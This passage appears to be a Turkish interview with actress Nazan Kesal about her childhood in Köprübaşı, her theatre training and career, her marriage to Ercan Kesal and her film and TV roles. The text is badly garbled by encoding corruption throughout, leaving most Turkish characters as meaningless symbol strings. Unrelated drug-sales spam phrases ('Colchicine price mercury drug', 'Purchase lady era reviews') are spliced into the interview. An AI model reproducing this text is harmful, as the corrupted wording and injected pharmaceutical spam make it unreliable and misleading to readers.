PAi??nar Erol

TanAi??AYtAi??AYAi??m kiAYi, Gorki Anaai??i??nAi??n bilinciyle, doAYduAYu kasabanAi??n sAi??nAi??rlarAi??nAi?? elleriyle geniAYletmiAY biri diyorum, AYaAYAi??rmayAi??n. MA?cadelesi baAYtan verilmiAY AYeylerle kucaklaAYmanAi??n hazzAi?? hiAi??bir AYeyde bu kadar anlam bulamazdAi??. Ai??ok iyi oyuncu olmak iAi??in verdiAYi mA?cadele de tane tane Ai??dA?llerini topluyor. Colchicine price mercury drug Her hafta nasAi??l oynamAi??AY diye televizyonun karAYAi??sAi??na mAi??hladAi??AYAi?? insanlar var.

Bu saAYlam, gA?ven veren, iAi??i AYefkatle tAi??ka basa dolu kadAi??nAi?? meAYer Ai??ok eskiden beri tanAi??yormuAYum. BuluAYtuAYumuz an anlAi??yorum. Basit yaAYama Ai??zlemindeki samimiyetini gAi??rA?yorum. Onu seviyorum.

Nazan Kesal, “Bu devir, sAi??radan insanAi??n en parlak zamanAi??; duygusuzluAYun, bilgisizliAYin, tembelliAYin, yeteneksizliAYin, hazAi??ra konmak isteyen bir kuAYaAYAi??n devridir…” sAi??zA?ne razAi?? gelmiyor. Niye gelsin, sAi??radanlAi??AYAi?? bilmiyor ki! AyrAi??ntAi??larAi??n namuslu oyuncusu o!

Elalem iAi??in yaAYanan kasabalardan birinde (burada adAi?? KAi??prA?baAYAi??-Manisa) motorsikletle ailesini tarlaya gAi??tA?ren bir kAi??z Ai??ocuAYunun tarlada karpuz yemesi, karnAi?? aAYrAi??yAi??ncaya kadar aAYacAi??ndan dut yemesi, tA?tA?n kAi??rmasAi??, dere kenarAi??nda su sesi eAYliAYinde hayal kurmasAi?? ve eril alAi??AYkanlAi??klara isyan etmesiyle geAi??en Ai??ocukluAYunun, Salihli Ticaret Lisesiai??i??ndeki coAYrafya Ai??AYretmeninin tiyatro oyununda oynatmasAi??yla, o dAi??AYavurumcu, gAi??zlemci, taklitAi??i, herkesi gA?ldA?ren Ai??ocuAYun neye yeteneAYi olduAYu da aAi??Ai??AYa Ai??Ai??kmAi??AY.
Profesyonel yaAYamda -ya iAYte lise mA?sameresi- tanAi??mlamasAi??nAi?? kullanAi??rken, iAYte o yAi??llar Ai??ncesine dAi??nA?verdim. ai???Neden ben Ai??AYretmenimai??? dediAYim zaman, ai???ya iAYte kAi??zAi??n adAi?? da Nazan, senin adAi??n da Nazan, hadi gel, sen oynarsAi??nai??? falan gibi basit bir seAi??imle olduAYunu Ai??AYrendim. Yoksa yeteneAYim olduAYunu aslAi??nda ben de sonradan fark ettim. O oyun bana, sahnede olmak Ai??ok gA?zel ve ben bunu sA?rdA?rsem ne harika olur duygusunu hissettirdi. Ama ondan Ai??nce kendime bile sAi??yleyemediAYim, iAYte kasabanAi??n cehaleti iAi??inde yaAYamanAi??n da verdiAYi bir yoksunlukla aslAi??nda bir biAi??imde tiyatro yapAi??yormuAYum ben. Mahalledeki kadAi??nlarla olan iliAYkim, tarlalarda iAYAi??i olarak Ai??alAi??AYAi??rken onlarla olan muhabbetim tiyatroymuAY. Bir taraftan tA?tA?n dikiyoruz, bir taraftan karnAi??mAi??zAi?? tutarak gA?lA?yoruz. Yani ben tiyatronun A?lA?sAi??nAi?? kendi Ai??ocukluAYumda, tanAi??mlanmamAi??AY biAi??imiyle yapmAi??AYAi??m.

Aileler Ai??ocuklarAi?? iAi??in bankada memurluAYu hayal ederler gA?venli meslek diye. Siz ise oyuncu olmak istiyorsunuz. Ai??ki amcanAi??z opera sanatAi??Ai??sAi??. Sizin Ai??nA?nA?zA? aAi??an da amcanAi??z Yunus KAi??rAi??lmAi??AY olmuAY.
Annem, babam garip bir biAi??imde, hiAi?? aklAi??mda olmayan iAYler dA?AYA?nmA?AYlerdi benim iAi??im. Ai??AYte keAYke polis olsan, olmadAi?? hemAYire olsan, olmadAi?? bankacAi?? olsan. HiAi??biri olmazsa keAYke iyi bir koca bulsan diye. Babam deAYil de; daha Ai??ok annem, etraftaki kadAi??n modellerinden etkilenip Ai??yle derdi. Ama ben bunlarAi??n hiAi??birine kulak asmayAi??p gene kendi bildiAYim yoldan, kendi inandAi??AYAi??m biAi??imiyle, iAi??imdeki sese Ai??ok iyi kulak vererek yol aldAi??m. Bedeli Ai??ok aAYAi??r oldu ama iyi de oldu bence. Kendimle tanAi??AYmAi??AY oldum aslAi??nda.

Seyirci olarak bizim iAi??in de Ai??ok iyi oldu. Ai??yi ki aileniz isminizi Nazan koymuAY. Bilmeden onlar hazAi??rlamAi??AYlar sizi oyunculuAYa.
Yoksa ben AYu anda bir overlokAi??u olabilirdim.

BabanAi??z ailenin en bA?yA?k Ai??ocuAYu. AslAi??nda o da oyuncu olmak istemiAY. Ses Dergisiai??i??nin aAi??tAi??AYAi?? yarAi??AYmada ikinci olmuAY. Ekrem Bora, Selda Alkor ile oynayacakken babasAi?? izin vermemiAY.
Sanatla adAi?? konmamAi??AY bir iliAYkisi olan enteresan bir aileyiz biz. Mesela babamAi??n sesi inanAi??lmaz gA?zeldir. Dedem onu Kuran kurslarAi??nda okutmuAY ve mA?ezzin olmayAi?? Ai??ok istermiAY babam, sesinin gA?zelliAYinden dolayAi??. AmcalarAi??mAi??n da sesi gA?zel. Babam mA?ezzin olamamAi??AYken; iki amcam opera sanatAi??Ai??sAi?? oluyor. Ablamla benim de sesimiz gA?zeldi. AmcalarAi??mAi??z bize rol model olduAYu iAi??in biz de sesimiz A?zerinden bir AYey yapabilir miyiz diye konservatuvar sAi??navlarAi??na girdik. Biraz daha Ai??abalasak belki kazanacaktAi??k ama dediAYim gibi kasabanAi??n kA?Ai??A?klA?AYA? ve hiAi??bir AYey bilememe halinden dolayAi?? sadece ses gA?zelliAYinin yeterli olmadAi??AYAi??nAi?? anladAi??k. Ne bileyim kA?Ai??A?k burjuva bir ailenin Ai??ocuAYu olsaydAi??k, nota bilseydik kesinlikle o sAi??navAi?? almAi??AYtAi??k yani. Mehmet amcam tenordu, onu erken yaAYta kaybettik. Yunus amcam da basbariton. Onu gAi??zleriniz kapalAi?? dinlerken Ruhi Su geri mi geldi hissi yaAYAi??yorsunuz.

BabanAi??z, kendi babasAi??nAi??n aksine sizi destekliyor ve konservatuvarAi?? kazandAi??AYAi??nAi??zAi?? Ai??AYrendiAYinde boynunuza sarAi??lAi??p aAYlAi??yor. Kendi hayalini sizin A?zerinizden gerAi??ekleAYtiriyor.
BabamAi??n yapamadAi??klarAi??nAi?? ben yapar hale gelince aslAi??nda annemden beklediAYim tepkiyi babamdan aldAi??m. Bizim toplumumuzda babalar kAi??zlarAi??nAi??n dAi??AYarAi?? aAi??Ai??lmasAi??ndan Ai??ok hoAYlanmazlar ama bizde de annem, anneannemden etkilenerek daha gelenekAi??i ve daha muhafazakA?rken; babam daha Ai??zgA?rlA?kAi??A? daha demokrat bir adamdAi??r. Boynuma atAi??ldAi?? gerAi??ekten. AAYladAi??k beraber.

Ai??zmir Dokuz EylA?l A?niversitesi, GA?zel Sanatlar FakA?ltesi Tiyatro – Oyunculuk BAi??lA?mA?ai??i??nden 1991 yAi??lAi??nda mezun oluyorsunuz ama kendinizi oraya ait hissetmediAYiniz iAi??in daha birinci sAi??nAi??fta okulu bAi??rakmayAi?? dA?AYA?nA?yorsunuz. HocalarAi??nAi??z Ai??zdemir Nutku, GA?rol Tonbul, Azahika Tekandai??i?? Sizi aksine ikna eden de Azahika Tekand. ai???BurayAi?? kazanAi??p geldiysen yeryA?zA?ne bir AYey sAi??yleyeceksin demek kiai??? demesi bizim iAi??in ne kadar Ai??nemli!
DAi??nA?p dolaAYAi??p yine oraya geliyorum. Kasabalar dipsiz kuyu gibi. Hep dibe Ai??ekerler. Birbirlerinin mutsuz olmasAi??nAi?? isterler. Kimse kimsenin aslAi??nda mutluluAYundan beslenmez. Tam tersi mutsuzluAYundan beslenirler. Garip bir paradokstur kasabalar. Ne kAi??ysA?nA?z, ne AYehirsiniz. Biraz zorlasanAi??z AYehir olacaksAi??nAi??z, daha Ai??zgA?rleAYecek ruhlar ama bir biAi??imde bA?rokrasi, topografya, nA?fus ona izin vermiyor. BirAi??ok sebepten dolayAi?? o sAi??kAi??AYmAi??AYlAi??k benim de hayatAi??ma, Ai??zellikle genAi?? kAi??zlAi??k dAi??nemime fazlasAi??yla sirayet etti. Ben de bu baskAi??yAi?? bir biAi??imde kiAYiliAYimle atlatmaya Ai??alAi??AYtAi??m. Daha anarAYist, daha baAYkaldAi??ran, daha direnen, hayAi??r, kadAi??n bu deAYil, kadAi??na bakAi??AY bu deAYil diyerek, aslAi??nda o cinsiyetAi??iliAYin ne kadar pis bir AYey olduAYunu hep hissettiAYim iAi??in belki bu kadar tepkisel yaAYadAi??m bilmiyorum. Birinci sAi??nAi??fta yaAYadAi??AYAi??m da tam bir kA?ltA?r AYokuydu. Alsancakai??i??ta gAi??rece ekonomik gA?cA? yA?ksek Ai??AYrencilerle aynAi?? bahAi??eyi paylaAYAi??yorum. Hepsi olmasa bile birAi??oAYu arabayla geliyor. BirAi??oAYunun kalacak yer problemi bile yok; aileleriyle yaAYAi??yor. Ben ise ablamla beraber ancak bir gecekondunun bodrum katAi??nda ev tutabilmiAYim. Ai??lk defa tiyatro kitaplarAi??nAi?? ben aslAi??nda A?niversitede okudum. Ai??lk defa tiyatro nedir orada gAi??rdA?m. Ai??lk defa amcamlar sayesinde opera izledim. AslAi??nda sanatla gecikmiAY bir buluAYmaydAi?? benimki. Daha doAYrusu, ben sanatla Ai??ok Ai??nceden tanAi??AYmAi??AYAi??m da profesyonel anlamda, kitaplarAi??n yazdAi??AYAi?? sanat dA?nyasAi??yla, onlarAi??n yapAi??tlarAi??yla Ai??ok gecikmiAY bir buluAYma yaAYadAi??m. BAi??rakma noktasAi?? da biraz bunlardan geliyor. SosyalleAYmede de bir kabAi??zlAi??k varsa, o iliAYkilerde kendini ifade edemiyorsan, aynAi?? dili konuAYmadAi??AYAi??nAi?? anlAi??yorsan, daha yalnAi??z kalAi??yorsun, daha iAi??ine kapanAi??yorsun ve kapandAi??kAi??a da demek ki bu iAYi ben yapamayacaAYAi??m noktasAi??na gelip hocanAi??n kapAi??sAi??nAi?? Ai??alAi??yorsun. O da Ai??ok AYahane bir insandAi??r, AYahane bir kadAi??ndAi??r, AYahane bir hocadAi??r, AYahane bir oyuncudur. O (Azahika Tekand) bana, ai???EAYer A?Ai?? yA?z kiAYi iAi??inde sen varsan, seAi??ilmiAYsen, demek ki bunun bir nedeni var. HiAi??bir yere gitmiyorsun, bunlarla mA?cadele edeceksinai??? dedi. Ondan sonra da gerAi??ekten benim iAi??in bambaAYka bir algAi?? baAYladAi??. Oyunculukla ilgili neyi, ne kadar alabilirim diye dA?AYA?nmeye baAYladAi??m. Bir taraftan Ai??alAi??AYmaya baAYladAi??m. Aileme yA?k olmamak iAi??in palyaAi??oluk yapAi??yordum. Bu arada kA?Ai??A?k erkek kardeAYim o sene ilkokulu bitirdi ve ortaokulu okumak iAi??in yanAi??ma geldi. Yine de ben kendimi AYanslAi?? hissediyorum. En azAi??ndan bunlarAi?? yapabilecek gA?cA? kendimde buldum ya da bir biAi??imde oluAYturdum ama bunlarAi?? hiAi?? yapamayan, o yetenekleri kaybolmuAY Ai??ok insan var.

1991 yAi??lAi??nda A?niversiteyi bitirdikten sonra idealleriniz iAi??in Ai??stanbulai??i??a geliyorsunuz. Politik tiyatro yapmak en bA?yA?k hedefiniz. O yAi??llarda Genco Erkal ile Ai??alAi??AYmayAi?? Ai??ok istiyorsunuz. SanAi??rAi??m hA?lA? bu gerAi??ekleAYmedi?
Genco Beyai??i??le Ai??alAi??AYmak en bA?yA?k hayallerimden biriydi ama denk gelmedi. O zaten aAYAi??rlAi??klAi?? olarak tek kiAYilik oyunlar oynuyor. O dAi??nemde kalabalAi??k kadrolu bir oyun iAi??in ai???auditionai??? yapacaAYAi??nAi?? duymuAYtum. OlmadAi?? ama sohbet etmiAY olduk. ai???Cam Bardaklar KAi??rAi??lsAi??nai??? oyununun asistanAi?? olarak devreye girmiAYtim, Azenal SarAi??hanai??i??Ai??n bir Ai??ykA?sA?ydA?. Adem Atar kaleme almAi??AYtAi??. O zaman oynamalarAi??nAi?? teklif ettikleri hiAi?? kimse kabul etmemiAYti. BeAYenmemiAYlerdi yani aslAi??nda. 12 EylA?lai??i??de, Fatsa Cezaeviai??i??nde adi ve siyasi tutuklularAi??n hikA?yesiydi. Bana tuhaf bir cahil cesareti geldi ve ben oynayayAi??m dedim. Nereden bulduysam o cesareti? Daha yirmi A?Ai?? yaAYAi??ndayAi??m. Ne yaAYadAi??n da ne oynuyorsun, deAYil mi? Ama iAYte o okulu ben tiyatro yapmak iAi??in bitirdim. Onun bir AYekilde buluAYmasAi?? lazAi??mdAi??. Ai??AYrendiklerimi sAi??nayacaAYAi??m, insanlara bir AYeyler sAi??yleyebileceAYim bir alan bulmam lazAi??mdAi??. Biraz da bAi??yle derdi olan bir insan olduAYum iAi??in galiba, meselemi ifade edebileceAYim bir AYey olsun diye girdim. Ve Ai??ok AYey Ai??AYrendim o oyundan.

Purchase lady era reviews O oyun deAYil mi zaten Nurettin Ai??zAYucaai??i??nAi??n mA?ziklerini yaptAi??AYAi??? O da Ercan Kesalai??i??Ai??n ev arkadaAYAi??. GittiAYiniz ai???Tiyatro ve Psikiyatriai??? seminerinde onun iAi??eri girer girmez kim olduAYunu anlAi??yorsunuz.
Evet, o oyun. O birAi??ok AYeyin habercisi de oldu. Bana sA?rekli bir arkadaAYAi??ndan bahsediyordu. Ben de ne kadar Ai??ok seviyorsun bu arkadaAYAi??nAi??. Bir gA?n getir de tanAi??AYalAi??m dedim. Ve prAi??miyere getirmesini istedim. Ona da denk gelmedi. Ercanai??i??Ai??n ortaklarAi??ndan biri olduAYu EylA?l Psikiyatri KliniAYi var. Orada ai???Tiyatro ve Psikolojiai??? A?zerine bir seminer dA?zenlemiAY. Ben bu seminere gitmek istiyorum deyince, Nurettin, ai???Beraber gidelim, o Ercanai??i??Ai??n dA?zenlediAYi bir AYeyai??? dedi. ai???A, Ai??yle mi? O zaman daha gA?zel, hem tanAi??AYAi??rAi??zai??? dedim. Nurettinai??i??in anlatAi??mlarAi??ndan benim kafamda Ercanai??i??a dair bir AYimAYek Ai??aktAi?? aslAi??nda. TanAi??madan A?AYAi??k oldum. Bu kadar mA?kemmel biri nasAi??l olur? Bir baAYkasAi??nAi??n aAYzAi??ndan dinliyorum. GAi??rA?r gAi??rmez de ai???bu adamai??? dedim yani. Ercan Kesalai??i??la tanAi??AYma oyunla baAYlayan bir sA?reAi??ti. Oyunu beAY, altAi?? ay oynadAi??m, sonra o tiyatro daAYAi??ldAi??.

Daha sonra Ai??stanbulai??i??da Tiyatro Aynaai??i??da ai???Rosa LA?ksemburgai??? (1994), ve ai???ZiyaretAi??iai???yi (1995), Tiyatro Ai??stanbulai??i??da ai???Ai??etin Ceviz”i (1996) oynuyorsunuz.
Evet, Dilek TA?rkerai??i??le Ai??alAi??AYtAi??m Tiyatro Aynaai??i??da. Sonra ai???Ai??etin Cevizai???de oynadAi??m Nevra Serezli ve Cihan A?nalai??i??la. Sonra DiyarbakAi??r Devlet Tiyatrosu sAi??navlarAi??na girdim. Azimdi bakAi??nca 90ai??i??larAi??n Ai??stanbulai??i??u Ai??ok Ai??zlediAYim bir Ai??stanbul. Azimdiki BeyoAYluai??i??nu dA?AYA?ndA?AYA?m zaman iyi ki ben o yAi??llarAi?? yaAYamAi??AYAi??m dedirten yAi??llar. Ai??zmir evet zordu ama Ai??stanbul Ai??zmirai??i??den de zor bir AYehir. Yani baAY etmem gereken AYeyler hem tiyatroda hem hayatAi??n iAi??inde ekonomik olarak Ai??ok daha fazlaydAi?? ve benim gerAi??ekten canAi??mAi?? yakmaya baAYlamAi??AYtAi??. HiAi?? istemediAYim halde Devlet Tiyatrosu sAi??navlarAi??na girdim. Ai??A?nkA? o memur anlayAi??AYAi??nAi?? Ai??ok tercih etmeyen biriydim. SAi??navAi?? kazanAi??nca dokuz yAi??l DiyarbakAi??rai??i??da yaAYadAi??m. O sA?rede yirmi beAYin A?zerinde oynadAi??AYAi??m oyun var, ayrAi??ca yAi??nettiAYim oyun var, muazzam bir yaAYanmAi??AYlAi??k var. HayatAi??mAi??n en gA?zel yAi??llarAi??nAi?? ben DiyarbakAi??rai??i??da yaAYadAi??m. Orada olmaktan, o kA?ltA?rden Ai??ok AYey Ai??AYrendim. Benim oyunculuAYumu asAi??l derinleAYtiren yer orasAi??. BaAYkalarAi??nAi??n aAYzAi??ndan alAi??ntAi??lAi??yorum; benim saptadAi??AYAi??m bir AYey deAYil bu. Bana ai???ayrAi??ntAi??larAi?? ne kadar gA?zel oynuyorsun ve derinleAYebiliyorsun girdiAYin roldeai??? derler. Ben o derinleAYmeyi oradaki hayatAi??, insanAi??, toplumu gAi??rA?nce anladAi??m. Orada tiyatro yapmakla, burada tiyatro yapmak asla aynAi?? AYey deAYil. AzAi??yle aAi??abilirim: Burada her AYey, herkesin elinin altAi??nda ama orada yoksun olduklarAi?? o kadar Ai??ok AYey var ki o insanlarAi??n. Siz onlar iAi??in baAY tacAi??sAi??nAi??z. Benim bir oyunumu on sekiz kere izleyen seyirci var orada. Mesela hiAi?? unutmuyorum, ai???Azahmeranai???Ai?? oynuyorum, artAi??k kaAi?? kere izlediyse Ai??ne almaya baAYladAi?? seyirci, benim bir sonraki repliAYimi vermeye baAYladAi??. Hatta buyurun yer deAYiAYtirelim, bir de sizdeki Azahmeran yorumunu gAi??relim demek istedim. Daha ne hikA?yeler var. Ai??yi ki gitmiAYim. Hatta giderken oyuncu bir arkadaAYAi??m ai???Salak mAi??sAi??n, ne iAYin var DiyarbakAi??rai???da? Otur AYurada, dizini Ai??ek, A?nlA? olai??? demiAYti bana. Tabii o sAi??zler benim bir kulaAYAi??mdan girdi, bir kulaAYAi??mdan Ai??Ai??ktAi??. Ai??A?nkA? Ai??ok ciddiye alacaAYAi??m biri deAYildi zaten. Ve AYimdi yok tabii ortada yani.

2004 baAYAi??nda Bursa Devlet Tiyatrosu’na atanAi??yorsunuz ve sonra 18 AralAi??k 2005 tarihinde Ercan Kesal ile evleniyorsunuz. 2006ai??i??da Poyraz doAYuyor. Size, ai???ben senin emanetinim anneai??? diyen Poyraz.
Beni Ai??ok can damarAi??mdan vuran cA?mleler sAi??ylA?yorsunuz. Bana A?Ai??, A?Ai?? buAi??uk yaAYAi??nda Ai??yle bir cA?mle sarf etti. Anneler Ai??ocuklarAi??na sorar ya sen benim neyimsin diye. ai???AAYkAi??nAi??m, bitanenimai??? gibi AYeyler sAi??yleyecek diye bekliyorum. ai???Anne, ben senin emanetinimai??? dedi. KaldAi??mai??i?? Ne diyeceAYimi bilemedim. O her AYeyi anlatan bir cA?mleydi yani. Ai??ocuklar bizim emanetimiz.

2002ai??i??de Ercan Kesalai??i??Ai?? aktAi??r yaptAi??ktan (ai???Uzakai??? / bara giren kel adam) sonra senarist yaptAi??ktan sonra, Cannesai??i??da birbirinizi Nuri Bilge Ceylanai??i??Ai??n filmleriyle kAi??rmAi??zAi?? halAi??da aAYAi??rlAi??yorsunuz. Nuri Bilge Ceylanai??i??Ai??n sAi??kAi?? bir oyuncusu ve dostusunuz.
ai???Ai??klimlerai??? ve ai???Uzakai??? ile o benim kontenjanAi??mdan geldi. ai???A?Ai?? Maymunai??? ve ai???Bir Zamanlar Anadoluai??? ile de ben onun kontenjanAi??ndan gittim. AslAi??nda Ercanai??i??Ai?? ben oyuncu ya da senarist yapmadAi??m. Sadece onda olan bir AYeyi gAi??rdA?m ve onun aAi??Ai??AYa Ai??Ai??kmasAi?? iAi??in aracAi?? oldum. Ben sadece sebep oldum diyebilirim. Ercanai??i??la konuAYurken espri de yapAi??yorum, ya ben seninle doktorsun diye evlendim, baAYAi??ma oyuncu, sinemacAi?? Ai??Ai??ktAi??n diye. MesleAYin Ai??z sAi??kAi??ntAi??larAi??nAi?? bildiAYim iAi??in doktorluk, mA?hendislik gibi daha Ai??ok zihinsel iAYler yapan insanlarAi??n dA?nyasAi?? bana daha cazip geliyordu. O yA?zden yedi sene tAi??p okumuAY birini seAi??tim ama o benden fena oyuncu Ai??Ai??ktAi??. Ai??Ercanai??i??a, ai???A?Ai?? Maymunai???daki o siyaset adamAi?? rolA? teklif edildiAYinde bana geldi ve o rolA? oynayamam dedi. AynAi?? zamanda Ercan filmin senaristlerinden de biriydi. Orada yazmasAi??na da ben sebep oldum. Nuri Bilge Ceylan bir iki denemeden sonra onun yazdAi??klarAi??nAi?? beAYendi ve A?Ai??lA? bir ekip oldular. Ai??lk Ai??nce oynamakla ilgili bAi??yle bir ayak diredi. HayAi??r dedim, bir yAi??netmen bakAi??p bunu senin yapabileceAYine inanmAi??AYsa senin yapamam deme lA?ksA?n yok. YapacaksAi??n, ben de sana yardAi??mcAi?? olacaAYAi??m. Ai??AYte el kamerasAi??yla Ai??alAi??AYmaya baAYladAi??k ama ilk Ai??ekimler korkunAi??tu tabii. Sonra biraz terminolojik konuAYunca, biraz sinema oyunculuAYu konuAYunca, bu nedir, ne olmalAi??, ne olmamalAi?? diye konuAYunca bir hizaya geldik.

2013ai??i??te ai???KayAi??p Azehirai??? dizisinin biteceAYi ilan edilince boAYluAYa dA?AYeceAYinizi hissediyorsunuz. Takip ettiAYiniz tiyatrolardan biri de Krek. Ai??Ai??inizden geAi??irdiAYiniz gA?nlerde Berkun Oya sizi ai???Iskaai??? iAi??in arayAi??nca, hiAi?? tanAi??madAi??AYAi??nAi??z halde ai???Aa merhaba Berkunai??i??cuAYum nasAi??lsAi??nai??? diyorsunuz.
BugA?ne kadar bir sA?rA? dizi yaptAi??m. HiAi??birinin bitmesine ai???KayAi??p Azehirai???in birden bire bitirilmesi kadar A?zA?lmemiAYtim. Ai??yle ki oturdum, aAYladAi??m. Orada oynadAi??AYAi??m Meryemai??i??de saAi??Ai??mAi?? hiAi?? boyamadan, kendi saAi??Ai??mAi??n beyazAi??yla oynamAi??AYtAi??m. Ne kadar yaAYlanabilirim, ne kadar daha o kadAi??n olabilirim derdine dA?AYmA?AYtA?m ve bAi??yle iki ay boyatmamAi??AYtAi??m saAi??larAi??mAi??. Zor vedalaAYtAi??m Meryemai??i??le. Bu acAi??yAi?? ancak tiyatro dindirebilir hissindeydim. Biraz da galiba Ai??aAYAi??rdAi??m ben Berkunai??i??u. Ai??A?nkA? onun yaptAi??AYAi?? iAYleri biliyorum, izliyorum, ah diyorum ne kadar AYahane. Radikal, risk alan iAYleri Ai??ok severim. O da TA?rkiyeai??i??de yapAi??lmamAi??AY iAYleri deniyor. BunlarAi?? sAi??ylediAYim gA?nlerde Berkunai??i??dan telefon geldi. Ve ilaAi?? gibi geldi oyun bana. SavaAY karAYAi??tAi?? bir oyundu, Ai??ok gA?zel bir iAYti. Ama ne yazAi??k ki oynandAi??AYAi?? mekA?nAi??n, Bilgi A?niversitesiai??i??nin derslik yapAi??lma isteAYiyle kapatAi??ldAi?? o tiyatro. Sanki derslik yapAi??lacak hiAi?? baAYka bir yer yokmuAY gibi! O gA?zelim tiyatroyu kapattAi??lar.

Peki, Reha Erdemai??i??i Ai??aAYAi??rmadAi??nAi??z mAi???
Reha Erdemai??i??i Ai??ok Ai??aAYAi??rdAi??m. Onunla Ai??ok sevdiAYimiz dostlarAi??m Yavuz Erten ve eAYinin evinde, gA?zel yemek masalarAi??nda buluAYtuk ama henA?z daha sinemada buluAYamadAi??k. Reha dA?nya gA?zeli bir adam. O yemeklerde hiAi?? ajite etmedim onu ama bir gA?n buluAYacaAYAi??z, biliyorum.

Ai??yi yAi??netmenlerin iyi oyuncususunuz. Bu enerjiden iAYte o Ai??dA?ller Ai??Ai??kAi??yor.
Benim Ai??ok iAi??ime sinen bir sinema geAi??miAYim var. Tayfun PirselimoAYlu, Nuri Bilge Ceylan, AtAi??l Ai??nanAi??, Zeki Demirkubuz, Yavuz Turgul, Ahu Ai??ztA?rk gibi iAYin ehli, o kadar kAi??ymetli insanlarla Ai??alAi??AYtAi??m ki ben. O filmlerde oynadAi??ktan sonra ben Ai??dA?l almasam da olur. Ne olacak ki o filmin kendisi Ai??dA?l TA?rkiye sinemasAi??na. Azimdi farklAi?? farklAi?? rolleri oynayabileceAYim bir yaAYtayAi??m ama senaryo yok. Ya Ai??nA? tAi??kandAi?? ya bu A?lkenin kA?ltA?r politikasAi?? her AYeye sirayet ettiAYi gibi, sinemaya da sirayet etti. Ai??yi senaryolar baAYka sebeplerden dolayAi?? KA?ltA?r BakanlAi??AYAi??ndan destek alamAi??yor. Ai??ok kAi??ymetli yAi??netmenlerimiz desteksiz kalAi??yor. Ai??yi bir sinema filminin oyuncusu olmayAi?? Ai??ok istiyorum tekrar, Ai??ok Ai??zledim Ai??A?nkA? beyaz perdeyi.

OyunculuAYun ilk kAi??rk yAi??lAi?? zor demiAY Altan Erbulak. Tam lezzetlenen bir birikimdeyken siz, tuhaf deAYil mi baAYrollerin genelde genAi?? oyunculara yazAi??lmasAi???
O yazAi??lAi??p yazAi??lmamasAi??yla da alakalAi?? deAYil. O, bu toplumun gAi??rmek istediAYi oyuncularla alakalAi?? bir AYey. Kapitalizmin yAi??nettiAYi bir kA?ltA?r algAi??sAi?? bu. Ai??A?nkA? kapitalizm, o yAi??ldAi??zlarAi?? doAYurmak zorunda. O yA?zden star olmak, yAi??ldAi??z olmak bana o kadar tuzak geliyor ki. O isimleri Ai??ok kolay Ai??AYA?tebiliyor sistem. HiAi??bir zaman o Ai??AYA?tA?lenlerin arasAi??nda olmayAi?? istemediAYim iAi??in benim oynadAi??AYAi??m bA?tA?n filmler 7. sanat filmleri. Ve en iyi Ai??rneklerinden.

Azu anda oynadAi??AYAi??nAi??z ai???Fazilet HanAi??m ve KAi??zlarAi??ai??? dizisinin senaristi SAi??rma YanAi??k ile daha Ai??nce ai???BugA?nA?n SaraylAi??sAi??ai???nda birlikte Ai??alAi??AYAi??yorsunuz. Fazilet rolA?nA? sizi hayal ederek yazmAi??AY. CanlandAi??rdAi??AYAi??nAi??z karaktere ai???Toz Bezi’Ai?? filminden dolayAi?? uzak deAYilsiniz.
Faziletai??i??i ben Ai??ok iAYtahla oynuyorum. Onu alelade bir iAY gibi oynamAi??yorum. Ben Faziletai??i??e Ai??ok inandAi??m Ai??A?nkA? misyonu olan bir kadAi??n. AnneliAYin bu kadar kutsandAi??AYAi?? bir toplumda onlarAi??n hata yapabilme oranAi??nAi?? gAi??steren bir iAY Fazilet. Yine ters kAi??AYe bir AYey. Bu ezber bozan hali zaten beni tavladAi??. Zengin olmak istiyor. AslAi??nda herkes zengin olmak istiyor. Ama herkes utangaAi?? ama yan taraftan parayAi?? gAi??stersen gizlice alAi??p cebine atacak. Herkes para kazanmak iAi??in yaAYAi??yor hayatta Ai??A?nkA? bu kapitalist dA?nya paran yoksa bir hiAi??sin, paran varsa seni tanAi??rAi??m diyor. Herkes tanAi??nmak, gAi??rA?nmek, ciddiye alAi??nmak istiyor. Faziletai??i??i bu anlamda Ai??nemsediAYim iAi??in biraz da bir misyon dizisi olarak oynuyorum. Dedim ya namusuyla Ai??alAi??AYmak diye. Bu diziyle ben bir AYey sAi??ylA?yor olmalAi??yAi??m. Bu da gerAi??ekleAYti ki bu kadar insan bu anti kahramanAi?? baAY tacAi?? yaptAi??.
Dizinin yAi??netmeni Murat SaraAi??oAYlu. Buradan teklif gelmeden Ai??nce, baAYka bir dizi iAi??in anlaAYAi??yorsunuz. Bir biAi??imde yolunuz o diziyle ayrAi??lAi??nca da kesin baAYkasAi??yla anlaAYmAi??AYlardAi??r diye dA?AYA?nseniz de AvAYar Filmai??i??e dAi??nA?AY yaptAi??AYAi??nAi??zda ai???sizi bekliyoruzai??? diyorlar.
BaAYka bir iAY iAi??in sAi??zleAYmeyi imzaladAi??m ama o iAYin gidiAYatAi?? benim hoAYlandAi??AYAi??m biAi??imde ilerlemedi. Senaristi deAYiAYtirmiAYler, benim oynayacaAYAi??m rolA? deAYiAYtirmiAYler ama bundan benim haberim yok. BAi??yle Ai??nA?me metazori gibi koydular. Ama benim imza attAi??AYAi??m sAi??zleAYme o senaryo iAi??in deAYildi. Ben Ai??ok sevdiAYim bir yazarAi??n iAYine imza atmAi??AYtAi??m. Ama senarist deAYiAYince alakasAi??z, bambaAYka, benim hiAi?? tercih etmeyeceAYim bir AYey olmuAY. HiAi?? gAi??nlA?mden geAi??miyor orada oynamak. Sonra AzA?krA? Bey (AvAYar) beni aradAi??. Sen dA?AYA?nA?lerek bir senaryo yazAi??ldAi?? dedi. Daha Ai??nce Ai??alAi??AYtAi??k biz SAi??rmaai??i??yla da. ai???Hay Allah! Ben bAi??yle bir AYeyin iAi??indeyim ama hiAi?? de mutlu deAYilim. AyrAi??lmak istiyorum, bir ayrAi??lmanAi??n koAYullarAi??na bakayAi??m, sizden on gA?n sA?re istiyorumai??? dedim. Ama ayrAi??lmama izin verilmedi. DAi??ndA?m AzA?krA? Beyai??i??i aradAi??m, ai???ben ne yazAi??k ki sizinle yol alamAi??yorum, bAi??yle bir baAYlayAi??cAi??lAi??AYAi?? var sAi??zleAYmeninai??? dedim. Sonra dA?AYA?ndA?m taAYAi??ndAi??m ve bu iAYte ben asla mutlu olmayacaAYAi??m ve mutlu olmadAi??AYAi??m bir iAYte herkesi mutsuz edeceAYim. Buna hiAi?? hakkAi??m yok. Gittim, lA?tfen beni azad edin dedim. SaAY olsunlar onlar da beni kAi??rmak istemediler. Tekrar AzA?krA? Beyai??i??i aradAi??AYAi??mda ilk cA?mlem AYuydu: ai???Faziletai??i??i bulduysanAi??z hiAi??bir AYey sAi??ylemeyin, kimsenin ekmeAYiyle oynamak istemem ama hA?lA? arAi??yorsanAi??z ben 